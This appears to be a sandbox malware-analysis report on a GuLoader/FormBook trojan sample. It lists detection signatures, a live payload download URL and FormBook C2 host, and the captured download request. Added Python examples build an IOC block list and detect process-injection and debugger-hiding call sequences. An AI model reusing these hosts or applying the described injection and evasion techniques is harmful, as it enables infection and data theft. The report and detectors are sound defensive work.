Windows Analysis Report ZGNX11JMSc.exe

Overview

General Information

Sample Name: ZGNX11JMSc.exe
Analysis ID: 448876
MD5: fcfb0ec70f1419ede8a534cc95cb61e9
SHA1: d3b529d77f1de00d63a75b3956d4bcf6bbce30ca
SHA256: ff1b034c7060724133c6df0aa8cf5411ec0e6775d3aca83a127617340a8c588a
Tags: 32, exe, GuLoader, trojan

Detection

GuLoader FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
GuLoader behavior detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
PE / OLE file has an invalid certificate
PE file contains strange resources
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Found malware configuration
Source: ZGNX11JMSc.exe Malware Configuration Extractor: GuLoader {"Payload URL": "http://ceattire.com/bin_UYDMbHwI28.bin"}
Source: 00000024.00000002.1042748926.00000000009C0000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.yellow-wink.com/nff/"], "decoy": ["shinseikai.site", "creditmystartup.com", "howtovvbucks.com", "betterfromthebeginning.com", "oubacm.com", "stonalogov.com", "gentrypartyof8.com", "cuesticksandsupplies.com", "joelsavestheday.com", "llanobnb.com", "ecclogic.com", "miempaque.com", "cai23668.com", "miscdr.net", "twzhhq.com", "bloomandbrewcafe.com", "angcomleisure.com", "mafeeboutique.com", "300coin.club", "brooksranchhomes.com", "konversiondigital.com", "dominivision.com", "superiorshinedetailing.net", "thehomechef.global", "dating-web.site", "gcbsclubc.com", "mothererph.com", "pacleanfuel.com", "jerseryshorenflflagfootball.com", "roberthyatt.com", "wwwmacsports.com", "tearor.com", "american-ai.com", "mkyiyuan.com", "gempharmatechllc.com", "verdijvtc.com", "zimnik-bibo.one", "heatherdarkauthor.net", "dunn-labs.com", "automotivevita.com", "bersatubagaidulu.com", "gorillarecruiting.com", "mikecdmusic.com", "femuveewedre.com", "onyxmodsllc.com", "ooweesports.com", "dezeren.com", "foeweifgoor73dz.com", "sorchaashe.com", "jamiitulivu.com", "jifengshijie.com", "ranchfiberglas.com", "glendalesocialmediaagency.com", "icuvietnam.com", "404hapgood.com", "planetturmeric.com", "danfrem.com", "amazonautomationbusiness.com", "switchfinder.com", "diversifiedforest.com", "findnehomes.com", "rsyueda.com", "colombianmatrimony.com", "evan-dawson.info"]}
Multi AV Scanner detection for submitted file
Source: ZGNX11JMSc.exe Virustotal: Detection: 20%
Yara detected FormBook
Source: Yara match File source: 00000024.00000002.1042748926.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.1042381038.0000000000060000.00000040.00000001.sdmp, type: MEMORY

Compliance:

Uses 32bit PE files
Source: ZGNX11JMSc.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: netstat.pdbGCTL source: ZGNX11JMSc.exe, 00000024.00000003.1041284039.0000000000A58000.00000004.00000001.sdmp
Source: Binary string: netstat.pdb source: ZGNX11JMSc.exe, 00000024.00000003.1041284039.0000000000A58000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: ZGNX11JMSc.exe, 00000024.00000002.1048163880.000000001E120000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: ZGNX11JMSc.exe
Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ANTISOCIA.pdb source: ZGNX11JMSc.exe

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.yellow-wink.com/nff/
Source: Malware configuration extractor URLs: http://ceattire.com/bin_UYDMbHwI28.bin
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SERVERIR SERVERIR
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
    GET /bin_UYDMbHwI28.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: ceattire.com
    Cache-Control: no-cache
Source: unknown DNS traffic detected: queries for: ceattire.com
Source: ZGNX11JMSc.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: ZGNX11JMSc.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: ZGNX11JMSc.exe, 00000024.00000002.1042870245.0000000000A21000.00000004.00000020.sdmp String found in binary or memory: http://ceattire.com/
Source: ZGNX11JMSc.exe, 00000024.00000003.1040714283.0000000000A36000.00000004.00000001.sdmp String found in binary or memory: http://ceattire.com/bin_UYDMbHwI28.bin
Source: ZGNX11JMSc.exe, 00000024.00000002.1042829626.00000000009F8000.00000004.00000020.sdmp String found in binary or memory: http://ceattire.com/bin_UYDMbHwI28.binI
Source: ZGNX11JMSc.exe, 00000024.00000002.1042829626.00000000009F8000.00000004.00000020.sdmp String found in binary or memory: http://ceattire.com/bin_UYDMbHwI28.binK
Source: ZGNX11JMSc.exe, 00000024.00000002.1042870245.0000000000A21000.00000004.00000020.sdmp String found in binary or memory: http://ceattire.com/o
Source: ZGNX11JMSc.exe String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: ZGNX11JMSc.exe String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: ZGNX11JMSc.exe String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: ZGNX11JMSc.exe String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: ZGNX11JMSc.exe String found in binary or memory: http://ocsp.digicert.com0C
Source: ZGNX11JMSc.exe String found in binary or memory: http://ocsp.digicert.com0O
Source: ZGNX11JMSc.exe String found in binary or memory: http://www.digicert.com/CPS0
Source: ZGNX11JMSc.exe String found in binary or memory: https://www.digicert.com/CPS0
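The extractor output in the AV Detection section gives the loader's payload URL and FormBook's real C2 together with 64 decoy domains, and the traffic above shows the download request the loader actually issued. Two points matter when these are handed to a SOC: FormBook contacts the decoys precisely to bury its real C2 in ordinary-looking traffic, so they belong on a watch list for correlation and not on a blocklist as if they were C2; and the User-Agent is the stock IE11-on-Windows-7 string, so it is not an indicator on its own and detection should key on host and path. The Python below is an added example, not part of this report or of Joe Sandbox, that turns the two configurations into a labelled IOC set and runs a reconstructed copy of the request through it. The decoy list is a six-entry subset of the 64 shown above, the request is reassembled from the headers the report printed, and the record layout is my own.

```python
"""Turn the two extracted configurations into a labelled IOC set and run a
reconstructed HTTP request through it. Added example; not part of the report."""
from urllib.parse import urlsplit

# Values copied from the report's configuration extractor output. The decoy
# list is a subset of the 64 domains shown there.
GULOADER_CONFIG = {"Payload URL": "http://ceattire.com/bin_UYDMbHwI28.bin"}
FORMBOOK_CONFIG = {
    "C2 list": ["www.yellow-wink.com/nff/"],
    "decoy": ["shinseikai.site", "creditmystartup.com", "howtovvbucks.com",
              "betterfromthebeginning.com", "roberthyatt.com", "evan-dawson.info"],
}


def normalize_c2(entry):
    """FormBook stores its C2 as 'host/path' without a scheme; prepend one so
    urlsplit() puts the host in netloc instead of path."""
    if "://" not in entry:
        entry = "http://" + entry
    parts = urlsplit(entry)
    return parts.hostname.lower(), parts.path or "/"


def build_iocs(guloader_cfg, formbook_cfg):
    """Return {"block": {host: (label, path)}, "watch_only": {host: (label, None)}}.
    Decoy domains are third-party sites FormBook contacts to hide its real C2,
    so they are kept for correlation but never put on the blocklist."""
    block, watch = {}, {}
    host, path = normalize_c2(guloader_cfg["Payload URL"])
    block[host] = ("guloader_payload", path)
    for c2 in formbook_cfg["C2 list"]:
        host, path = normalize_c2(c2)
        block[host] = ("formbook_c2", path)
    for decoy in formbook_cfg["decoy"]:
        watch[decoy.lower()] = ("formbook_decoy", None)
    return {"block": block, "watch_only": watch}


def parse_http_request(raw):
    """Minimal parser for a raw HTTP/1.x request (request line plus headers)."""
    lines = raw.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line:            # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def classify_request(raw, iocs):
    """Match the Host header against the IOC set; the User-Agent is deliberately
    ignored because the stock IE11 string carries no signal by itself."""
    _method, target, headers = parse_http_request(raw)
    host = headers.get("host", "").lower()
    hit = iocs["block"].get(host)
    if hit:
        label, path = hit
        # Host-only matches still block: operators rotate filenames on one server.
        return {"verdict": "block", "label": label, "host": host,
                "exact_path": target == path}
    if host in iocs["watch_only"]:
        return {"verdict": "watch", "label": "formbook_decoy", "host": host}
    return {"verdict": "allow", "host": host}


# Constructed request, reassembled from the headers shown in the report.
SAMPLE_REQUEST = ("GET /bin_UYDMbHwI28.bin HTTP/1.1\r\n"
                  "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\r\n"
                  "Host: ceattire.com\r\n"
                  "Cache-Control: no-cache\r\n\r\n")
# Constructed request to one of the decoy domains.
DECOY_REQUEST = "GET / HTTP/1.1\r\nHost: roberthyatt.com\r\n\r\n"

if __name__ == "__main__":
    iocs = build_iocs(GULOADER_CONFIG, FORMBOOK_CONFIG)
    for request in (SAMPLE_REQUEST, DECOY_REQUEST):
        print(classify_request(request, iocs))
```

The payload request comes back as a block with an exact path match, the decoy request as watch-only, and an unrelated host as allow.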

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000024.00000002.1042748926.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.1042381038.0000000000060000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000024.00000002.1042748926.00000000009C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000024.00000002.1042748926.00000000009C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000024.00000002.1042381038.0000000000060000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000024.00000002.1042381038.0000000000060000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Process Stats: CPU usage > 98%
Contains functionality to call native functions
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022468CC NtWriteVirtualMemory, 1_2_022468CC
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_0224879F NtProtectVirtualMemory, 1_2_0224879F
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02248C82 NtSetInformationThread, 1_2_02248C82
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022454E5 NtAllocateVirtualMemory, 1_2_022454E5
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022442CD NtWriteVirtualMemory, 1_2_022442CD
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02241B1A NtWriteVirtualMemory, 1_2_02241B1A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02241B5F NtWriteVirtualMemory, 1_2_02241B5F
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02244B8E NtWriteVirtualMemory, 1_2_02244B8E
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022443F1 NtWriteVirtualMemory, 1_2_022443F1
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02247036 NtWriteVirtualMemory, 1_2_02247036
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02244071 NtWriteVirtualMemory, 1_2_02244071
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02242958 NtWriteVirtualMemory, 1_2_02242958
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02241E2C NtWriteVirtualMemory, 1_2_02241E2C
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02244785 NtWriteVirtualMemory, 1_2_02244785
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_0224341B NtWriteVirtualMemory, 1_2_0224341B
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02248CD5 NtSetInformationThread, 1_2_02248CD5
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_0224251E NtWriteVirtualMemory, 1_2_0224251E
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02248D58 NtSetInformationThread, 1_2_02248D58
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022455AC NtAllocateVirtualMemory, 1_2_022455AC
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189A00 NtProtectVirtualMemory,LdrInitializeThunk, 36_2_1E189A00
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189A20 NtResumeThread,LdrInitializeThunk, 36_2_1E189A20
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189A50 NtCreateFile,LdrInitializeThunk, 36_2_1E189A50
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189660 NtAllocateVirtualMemory,LdrInitializeThunk, 36_2_1E189660
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1896E0 NtFreeVirtualMemory,LdrInitializeThunk, 36_2_1E1896E0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189710 NtQueryInformationToken,LdrInitializeThunk, 36_2_1E189710
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189780 NtMapViewOfSection,LdrInitializeThunk, 36_2_1E189780
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1897A0 NtUnmapViewOfSection,LdrInitializeThunk, 36_2_1E1897A0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189840 NtDelayExecution,LdrInitializeThunk, 36_2_1E189840
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189860 NtQuerySystemInformation,LdrInitializeThunk, 36_2_1E189860
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1898F0 NtReadVirtualMemory,LdrInitializeThunk, 36_2_1E1898F0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189910 NtAdjustPrivilegesToken,LdrInitializeThunk, 36_2_1E189910
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189540 NtReadFile,LdrInitializeThunk, 36_2_1E189540
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1899A0 NtCreateSection,LdrInitializeThunk, 36_2_1E1899A0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1895D0 NtClose,LdrInitializeThunk, 36_2_1E1895D0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189610 NtEnumerateValueKey, 36_2_1E189610
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189A10 NtQuerySection, 36_2_1E189A10
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189650 NtQueryValueKey, 36_2_1E189650
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189670 NtQueryInformationProcess, 36_2_1E189670
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189A80 NtOpenDirectoryObject, 36_2_1E189A80
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1896D0 NtCreateKey, 36_2_1E1896D0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E18A710 NtOpenProcessToken, 36_2_1E18A710
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189B00 NtSetValueKey, 36_2_1E189B00
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189730 NtQueryVirtualMemory, 36_2_1E189730
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189770 NtSetInformationFile, 36_2_1E189770
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E18A770 NtOpenThread, 36_2_1E18A770
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189760 NtOpenProcess, 36_2_1E189760
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E18A3B0 NtGetContextThread, 36_2_1E18A3B0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189FE0 NtCreateMutant, 36_2_1E189FE0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189820 NtEnumerateKey, 36_2_1E189820
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E18B040 NtSuspendThread, 36_2_1E18B040
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1898A0 NtWriteVirtualMemory, 36_2_1E1898A0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E18AD30 NtSetContextThread, 36_2_1E18AD30
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189520 NtWaitForSingleObject, 36_2_1E189520
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189950 NtQueueApcThread, 36_2_1E189950
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189560 NtWriteFile, 36_2_1E189560
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1899D0 NtCreateProcessEx, 36_2_1E1899D0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1895F0 NtQueryInformationFile, 36_2_1E1895F0
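The native-function list above is the raw material for the injection and anti-debug signatures in the summary: a child started suspended, a section created and mapped into another process, a remote thread's context rewritten and resumed, and NtSetInformationThread used to hide a thread from the debugger. None of these calls is malicious on its own; the signal is the order in which they hit the same target process. The Python below is an added example, not Joe Sandbox code, of that kind of sequence-based classification over an API-call trace. The trace is constructed to mirror this sample's observed behaviour (the process chain above shows ZGNX11JMSc.exe launching a copy of itself), the numeric constants come from the Windows SDK and ntdll headers, and the record field names are my own.

```python
"""Classify an API-call trace into the injection and anti-analysis patterns a
sandbox flags. Added example; the trace below is constructed, not a capture."""
from collections import namedtuple

Call = namedtuple("Call", "pid tid api args")

# Constants from the Windows SDK / ntdll headers.
CREATE_SUSPENDED = 0x00000004           # CreateProcess creation flag
THREAD_HIDE_FROM_DEBUGGER = 0x11        # THREADINFOCLASS for NtSetInformationThread
PAGE_EXECUTE_READWRITE = 0x40


def is_remote(c):
    """A call is 'remote' when it names a target process other than the caller."""
    return c.args.get("target_pid") not in (None, c.pid)


def api(name, **conds):
    """Predicate: API name matches and every listed argument equals its value."""
    return lambda c: c.api == name and all(c.args.get(k) == v for k, v in conds.items())


def remote(name, **conds):
    base = api(name, **conds)
    return lambda c: base(c) and is_remote(c)


def _subsequence(calls, predicates):
    """Indices of an in-order (not necessarily adjacent) match of predicates
    against calls, or None if the sequence is incomplete."""
    idx, matched = 0, []
    for i, c in enumerate(calls):
        if predicates[idx](c):
            matched.append(i)
            idx += 1
            if idx == len(predicates):
                return matched
    return None


PATTERNS = {
    "suspended_child": [lambda c: c.api in ("CreateProcessW", "CreateProcessA", "NtCreateProcessEx")
                        and c.args.get("flags", 0) & CREATE_SUSPENDED],
    "remote_section_mapping": [api("NtCreateSection"), remote("NtMapViewOfSection")],
    "thread_context_hijack": [remote("NtWriteVirtualMemory"), remote("NtSetContextThread"),
                              remote("NtResumeThread")],
    "apc_injection": [remote("NtQueueApcThread")],
    "rwx_memory": [lambda c: c.api in ("NtAllocateVirtualMemory", "NtProtectVirtualMemory")
                   and c.args.get("protect") == PAGE_EXECUTE_READWRITE],
    "hide_from_debugger": [api("NtSetInformationThread", info_class=THREAD_HIDE_FROM_DEBUGGER)],
}
# Patterns evaluated on the caller alone; the rest are evaluated per target process.
LOCAL = {"suspended_child", "rwx_memory", "hide_from_debugger"}


def classify(trace):
    """Return {pattern: [target pids]} for every pattern found in the trace.
    Remote patterns are matched per target so that calls aimed at different
    processes are never stitched into one chain."""
    found = {}
    targets = sorted({c.args["target_pid"] for c in trace if is_remote(c)})
    for name, preds in PATTERNS.items():
        if name in LOCAL:
            if _subsequence(trace, preds) is not None:
                found[name] = []
            continue
        for tgt in targets:
            sub = [c for c in trace if c.args.get("target_pid") in (None, tgt)]
            if _subsequence(sub, preds) is not None:
                found.setdefault(name, []).append(tgt)
    return found


# Constructed trace: loader (pid 1000) hides its thread, grabs RWX memory, starts a
# copy of itself suspended (pid 1001), maps a section into it, writes, rewrites the
# thread context and resumes. Modelled on the calls listed in the report.
TRACE = [
    Call(1000, 1, "NtSetInformationThread", {"info_class": THREAD_HIDE_FROM_DEBUGGER}),
    Call(1000, 1, "NtAllocateVirtualMemory", {"protect": PAGE_EXECUTE_READWRITE, "size": 0x9000}),
    Call(1000, 1, "CreateProcessW", {"image": r"C:\Users\user\Desktop\ZGNX11JMSc.exe",
                                     "flags": CREATE_SUSPENDED, "target_pid": 1001}),
    Call(1000, 1, "NtCreateSection", {"size": 0x20000}),
    Call(1000, 1, "NtMapViewOfSection", {"target_pid": 1001}),
    Call(1000, 1, "NtWriteVirtualMemory", {"target_pid": 1001, "size": 0x1000}),
    Call(1000, 1, "NtGetContextThread", {"target_pid": 1001}),
    Call(1000, 1, "NtSetContextThread", {"target_pid": 1001}),
    Call(1000, 1, "NtResumeThread", {"target_pid": 1001}),
]

if __name__ == "__main__":
    print(classify(TRACE))
```

On the constructed trace the classifier reports the suspended child, the remote section mapping and the thread-context hijack against pid 1001, plus the RWX allocation and the hidden thread; a plain CreateProcessW without CREATE_SUSPENDED yields nothing. Ordering-only matching is deliberately loose: it tolerates interleaved unrelated calls, at the cost of missing variants that skip a step (a hollowing chain that relies on NtUnmapViewOfSection plus NtAllocateVirtualMemory rather than a section, for instance), so new chains are added as new entries in PATTERNS rather than by relaxing existing ones.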
Detected potential crypto function
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022408FD 1_2_022408FD
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022468CC 1_2_022468CC
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022458C9 1_2_022458C9
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02248C82 1_2_02248C82
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022454E5 1_2_022454E5
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022404CA 1_2_022404CA
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022472C3 1_2_022472C3
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022442CD 1_2_022442CD
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02241B2D 1_2_02241B2D
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02241B1A 1_2_02241B1A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02247B73 1_2_02247B73
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02241B5F 1_2_02241B5F
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02248385 1_2_02248385
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02244B8E 1_2_02244B8E
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02243B9A 1_2_02243B9A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022443F1 1_2_022443F1
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02247036 1_2_02247036
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_0224100E 1_2_0224100E
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_0224881D 1_2_0224881D
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02244071 1_2_02244071
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02240845 1_2_02240845
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022408B3 1_2_022408B3
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022408E2 1_2_022408E2
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022420E3 1_2_022420E3
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022458F8 1_2_022458F8
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022480D4 1_2_022480D4
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_0224790A 1_2_0224790A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02247153 1_2_02247153
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02242958 1_2_02242958
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022429B0 1_2_022429B0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022451BE 1_2_022451BE
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02242183 1_2_02242183
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02241E2C 1_2_02241E2C
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02240610 1_2_02240610
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_0224767B 1_2_0224767B
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02243E5E 1_2_02243E5E
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022476B2 1_2_022476B2
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02243EC4 1_2_02243EC4
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02247F03 1_2_02247F03
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02243F0C 1_2_02243F0C
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02247F6D 1_2_02247F6D
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02240FB5 1_2_02240FB5
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02244785 1_2_02244785
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02240C24 1_2_02240C24
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_0224341B 1_2_0224341B
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02248446 1_2_02248446
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02243C4E 1_2_02243C4E
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02243CF0 1_2_02243CF0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022434C4 1_2_022434C4
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02248CD5 1_2_02248CD5
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_0224350F 1_2_0224350F
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_0224251E 1_2_0224251E
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02247D52 1_2_02247D52
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02248D58 1_2_02248D58
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02240D83 1_2_02240D83
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02240D9C 1_2_02240D9C
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02245DCA 1_2_02245DCA
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E166E30 36_2_1E166E30
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17EBB0 36_2_1E17EBB0
